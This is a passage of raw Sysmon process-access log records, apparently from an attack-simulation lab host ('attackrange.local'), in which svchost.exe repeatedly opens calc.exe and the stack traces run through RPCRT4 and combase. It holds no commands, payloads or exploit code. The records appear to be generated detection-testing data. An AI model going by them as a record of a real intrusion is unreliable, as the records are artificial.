22:12:48.124{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360489Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.124{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360488Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.124{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360487Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.124{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360486Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.124{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360485Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.124{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360484Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.124{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360483Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.108{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360482Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.108{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360481Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.108{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360480Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.108{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360479Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.108{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360478Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.108{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360477Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.108{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360476Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.108{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360475Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.108{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360474Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.108{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360473Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.108{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360472Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.108{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360471Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.108{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360470Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.108{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360469Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.108{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+37cee|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360468Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 